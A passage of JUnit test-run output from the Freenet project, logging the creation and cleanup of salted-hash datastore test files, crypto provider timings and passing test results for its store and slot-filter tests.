    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter) for testCachingFreenetStoreSSK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreSSK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Successfully closed store testCachingFreenetStoreOnClose
    [junit] Successfully closed store testCachingFreenetStoreOnClose
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnClose.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnClose.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnClose.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter) for testCachingFreenetStoreSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Successfully closed store testCachingFreenetStoreTimeExpire
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreTimeExpire.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreTimeExpire.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreTimeExpire.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.slotfilter) for testCachingFreenetStoreOnCloseSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter) for testCachingFreenetStoreSSK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter) for testCachingFreenetStoreSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Tests run: 12, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 18,69 sec
    [junit] Tests run: 12, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 18,69 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12131876ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12277187ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreSSK
    [junit] Successfully closed store testCachingFreenetStoreOnClose
    [junit] Successfully closed store testCachingFreenetStoreOnClose
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreTimeExpire
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.metadata
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.slotfilter) for testCachingFreenetStoreOnCloseSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter) for testCachingFreenetStoreSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnClose.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnClose.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnClose.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter) for testCachingFreenetStoreSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreTimeExpire.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreTimeExpire.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreTimeExpire.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.slotfilter) for testCachingFreenetStoreOnCloseSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter) for testCachingFreenetStoreSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter) for testCachingFreenetStoreSSK is loaded (new=true).
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreSSK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testOnCollisionsSSK took 9,649 sec
    [junit] Testcase: testSimpleCHK took 1,143 sec
    [junit] Testcase: testSimpleSSK took 1,027 sec
    [junit] Testcase: testOnCloseCHK took 0,308 sec
    [junit] Testcase: testOnCloseSSK took 0,653 sec
    [junit] Testcase: testManualWriteCollision took 0,257 sec
    [junit] Testcase: testTimeExpireCHK took 0,409 sec
    [junit] Testcase: testTimeExpireSSK took 0,86 sec
    [junit] Testcase: testCollisionsOverMaximumSize took 0,213 sec
    [junit] Testcase: testSimpleManualWrite took 0,129 sec
    [junit] Testcase: testZeroSize took 0,497 sec
    [junit] Testcase: testOverMaximumSize took 2,974 sec
    [junit] Shutting down...
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreOnClose
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreOnClose
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreTimeExpire
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreOnCloseSSK
    [junit] Successfully closed store testCachingFreenetStoreSSK
    [junit] Successfully closed store testCachingFreenetStoreSSK
    [junit] Successfully closed store testCachingFreenetStoreSSK
    [junit] Successfully closed store testCachingFreenetStoreSSK
    [junit] Running freenet.store.saltedhash.SaltedHashFreenetStoreTest
    [junit] Testsuite: freenet.store.saltedhash.SaltedHashFreenetStoreTest
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore
    [junit] Slot filter (tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.slotfilter) for testSaltedHashFreenetStoreOnCloseSSK is loaded (new=true).
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi511529968691651791lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12325568ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12420593ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.slotfilter
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.hd
    [junit] Slot filter (tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.slotfilter) for testSaltedHashFreenetStoreOnCloseSSK is loaded (new=true).
    [junit] Successfully closed store testSaltedHashFreenetStoreOnCloseSSK
    [junit] Successfully closed store testSaltedHashFreenetStoreOnCloseSSK
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.slotfilter
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] Successfully closed store testSaltedHashFreenetStoreCHK
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreCHK.config
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore
    [junit] Successfully closed store testSaltedHashFreenetStoreSSK
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 13,027 sec
    [junit] Tests run: 3, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 13,027 sec
    [junit] ------------- Standard Output ---------------
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12325568ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12420593ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] Successfully closed store testSaltedHashFreenetStoreOnCloseSSK
    [junit] Successfully closed store testSaltedHashFreenetStoreOnCloseSSK
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] Successfully closed store testSaltedHashFreenetStoreCHK
    [junit] Successfully closed store testSaltedHashFreenetStoreSSK
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreSSK.config
    [junit] Slot filter (tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.slotfilter) for testSaltedHashFreenetStoreOnCloseSSK is loaded (new=true).
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.slotfilter
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.hd
    [junit] Slot filter (tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.slotfilter) for testSaltedHashFreenetStoreOnCloseSSK is loaded (new=true).
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.metadata
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.config
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.slotfilter
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreOnCloseSSK.hd
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreCHK.config
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreSSK.hd
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreSSK.metadata
    [junit] DELETING FILE tmp-saltedHashfreenetstoretest/saltstore/testSaltedHashFreenetStoreSSK.config
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testOnCollisionsSSK took 10,039 sec
    [junit] Testcase: testSimpleCHK took 1,584 sec
    [junit] Testcase: testSimpleSSK took 0,789 sec
    [junit] Shutting down...
    [junit] Successfully closed store testSaltedHashFreenetStoreOnCloseSSK
    [junit] Successfully closed store testSaltedHashFreenetStoreCHK
    [junit] Successfully closed store testSaltedHashFreenetStoreOnCloseSSK
    [junit] Successfully closed store testSaltedHashFreenetStoreSSK
    [junit] Running freenet.store.saltedhash.SaltedHashSlotFilterTest
    [junit] Testsuite: freenet.store.saltedhash.SaltedHashSlotFilterTest
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
    [junit] HmacSHA256: using SunJCE version 1.7
    [junit] INFO: Optimized native BigInteger library 'net/i2p/util/libjbigi-linux-x86_64.so' loaded from resource
    [junit] OpenJDK 64-Bit Server VM warning: You have loaded library /tmp/jbigi6651877886827377202lib.tmp which might have disabled stack guard. The VM will try to fix the stack guard now.
    [junit] It's highly recommended that you fix the library with 'execstack -c <libfile>', or link it with '-z noexecstack'.
    [junit] SHA1: using SUN version 1.7
    [junit] MD5: using SUN version 1.7
    [junit] SHA-256: using SUN version 1.7
    [junit] SHA-384: using SUN version 1.7
    [junit] SHA-512: using SUN version 1.7
    [junit] AES/CTR/NOPADDING (SunJCE version 1.7): 12048372ns
    [junit] AES/CTR/NOPADDING (BC version 1.54): 12264320ns
    [junit] Using JCA cipher provider: SunJCE version 1.7
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] Rebuilding slot filter because new
    [junit] WrapperManager: Initializing...
    [junit] WrapperManager: WARNING - The wrapper.native_library system property was not
    [junit] WrapperManager:           set. Using the default value, 'wrapper'.
    [junit] testCachingFreenetStoreCHK cleaner in progress: 0/100
    [junit] WrapperManager: WARNING - The version of the Wrapper which launched this JVM is 
    [junit] WrapperManager:           "unknown" while the version of the native library 
    [junit] WrapperManager:           is "3.5.14".
    [junit] WrapperManager:           The Wrapper may appear to work correctly but some features may
    [junit] WrapperManager:           not function correctly.  This configuration has not been tested
    [junit] WrapperManager:           and is not supported.
    [junit] WrapperManager: 
    [junit] testCachingFreenetStoreCHK cleaner finished successfully.
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.hd
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.metadata
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.config
    [junit] Successfully closed store testCachingFreenetStoreCHK
    [junit] DELETING FILE tmp-cachingfreenetstoretest/saltstore
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=true).
    [junit] Slot filter (tmp-cachingfreenetstoretest/saltstore/testCachingFreenetStoreCHK.slotfilter) for testCachingFreenetStoreCHK is loaded (new=false).
